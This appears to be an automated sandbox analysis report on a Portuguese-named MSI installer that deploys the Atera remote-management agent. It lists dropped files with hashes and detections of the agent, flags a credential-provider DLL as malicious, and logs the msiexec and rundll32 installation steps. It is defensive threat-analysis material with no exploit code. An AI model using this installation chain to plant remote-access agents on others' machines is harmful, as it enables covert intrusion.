                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFD0D1B46149ACC505.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFE942440AACDF3AD6.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFECDCDF0BA996B022.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5701014991086903
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:r8PhFuRc06WXz+FT5Sdm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:ShF1jFT8m3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:9E9CA92874801068799CF975C6C84F90
                                                                                                                                                                                                                                                                                                                                  SHA1:233CD27A9FE22100D0DBBBB47BD8970E30106962
                                                                                                                                                                                                                                                                                                                                  SHA-256:15C0CD0E4D28938F1EF82D1EF0F12BCE0175E53A1BA1F1B9F7CDEA661A143A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:83C5A56BE85A743CF3BB8DBEFFD889E900555CCA765FC9BFDAA53AE309BF3FB15A97812C1AC2832A37E6528288D1C23DEEEC5BFA1940F79A95960230AAA01091
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFECDCDF0BA996B022.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFF146BB79DBCE8C40.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFF29A547E40BE6F63.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):172032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.4608669714804567
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:hIcuA5YHr6gsffcvSOxWX5WclJnJjC/cuA5YHr6gsffcvSOxWX5WclJnJjCL:h5dGHPssvS8cbdGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:0D7E1127A6517FE727FA2390D1763A8A
                                                                                                                                                                                                                                                                                                                                  SHA1:4EEC0864796D06B38F7F943DBC3E62452802C9AD
                                                                                                                                                                                                                                                                                                                                  SHA-256:70329C991A051B2A125494175C9999821B517B0C40E7DDC904472900000290F5
                                                                                                                                                                                                                                                                                                                                  SHA-512:ED081D0A2B7AAE0EA647B99C4D69871B88C333B3259D869BDF5DE7D2F97DEB0076E74017CD635BDC02B60193C22176571FB1F49AAAB41B7FA21443F6A38B280A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.14313291994698224
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:CnVubmStedGPdGeqISoedGPdGfonrhSpge9D:icyLInM5
                                                                                                                                                                                                                                                                                                                                  MD5:1B5B18AB704E112C47850FED95B6416D
                                                                                                                                                                                                                                                                                                                                  SHA1:92CC95057A0DD5B236F298D15900ADA4E9242E7B
                                                                                                                                                                                                                                                                                                                                  SHA-256:2BEE1743A1250BE914EF73508162988D38AD070777B58C002A0AF1F160955F04
                                                                                                                                                                                                                                                                                                                                  SHA-512:F8B0DA9D55F655A09856F349CE920324CE7FE22E9C8097589B5DFC588A579FD96195BBB4747C35C3C513B071799310B774197F42159104C07202E932CFD67C46
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFF836B9014E8CB7C8.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFFE4BC67206FDB3B3.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\SRCredentialProvider.dll (copy)

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..............].......j.......j.......j...............j.......j.......j...............j......Rich....................PE..d......e.........." ................<........................................@............@..........................................p..w....^....... ...........6.......(...0...... ...................................................(............................text...>~.......................... ..`.rdata..G...........................@..@.data....[.......&...f..............@....pdata...6.......8..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Cy:Cy
                                                                                                                                                                                                                                                                                                                                  MD5:17C47928D1BA7ECB789EE3E4E7BB61A4
                                                                                                                                                                                                                                                                                                                                  SHA1:58836A68D7DA82082C676A5E1F5BC33F2A8CADF0
                                                                                                                                                                                                                                                                                                                                  SHA-256:42A3ABE36D8E5C5CB6123D9DA9ADB152C87AD6E08CB6327BB5405A8E297635E4
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF35FF11C834B9F6696C0EB1FA3F32A3DAE4C304AB872E2A5357D539DDA15C3AC7BD618B5AE8628BCF42BC9B47AFE0C6796816318B2E10B8378EDAFD953EE336
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:52..

                                                                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.878685496531656
                                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                                  • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                                                                                                                  • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                                                                                                                  File name:Arquivo_4593167.msi
                                                                                                                                                                                                                                                                                                                                  File size:2'994'176 bytes
                                                                                                                                                                                                                                                                                                                                  MD5:2ba70a300e16d1b51bd103de907777d8
                                                                                                                                                                                                                                                                                                                                  SHA1:9774343aeb3b6f06593fc84a59422ef3b8cce66b
                                                                                                                                                                                                                                                                                                                                  SHA256:0d47740bf97710835ebe91ac545ff0da45d81b54dfb8e2dea485fe5a123ae468
                                                                                                                                                                                                                                                                                                                                  SHA512:a2ba8694ea4d014e4103ed02d11ba7309d0ce0f290f55f0d671710cdf61f6d06d976531469686325965966a2d9cd5a0b3a69f47ca5b351b40da03ffaf15d47bb
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                                                                  TLSH:7CD523117584483AE37B0A358D7ADAA05E7DFE605B70CA8E9308741E2D705C1AB76FB3
                                                                                                                                                                                                                                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c83f0000
                                                                                                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c83f0000
                                                                                                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:57
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:57
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                                                  Start time:18:29:58
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
